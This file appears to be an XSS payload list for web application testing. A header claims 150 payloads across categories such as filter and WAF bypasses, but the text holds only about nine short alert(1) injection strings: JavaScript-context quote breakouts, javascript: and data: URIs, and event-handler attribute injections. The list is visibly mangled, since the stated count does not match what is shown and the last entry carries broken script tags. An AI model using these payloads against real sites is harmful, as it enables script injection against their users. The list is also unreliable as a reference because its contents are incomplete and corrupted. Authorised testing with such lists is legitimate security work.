# XSS Payload List # Source: xss.page # Total Payloads: 150 # For educational and authorized testing purposes only # Use only on systems you own or have explicit permission to test # # Format: One payload per line # Categories: Basic, Event Handlers, SVG, HTML5, JavaScript Context, URL, Attributes, # Filter Bypasses, Encoding, Polyglots, DOM, WAF Bypass, Advanced, # Legacy/IE, Modern, Style/CSS, XML, Protocol Handlers, Obfuscation, # Framework-Specific, Mobile, Data URIs, Comments, Meta, Interaction, CSS

'; alert(1); // "; alert(1); // -alert(1)- ${alert(1)} javascript:alert(1) data:text/html, " onclick="alert(1) " autofocus onfocus="alert(1) ipt>alert(1)ipt>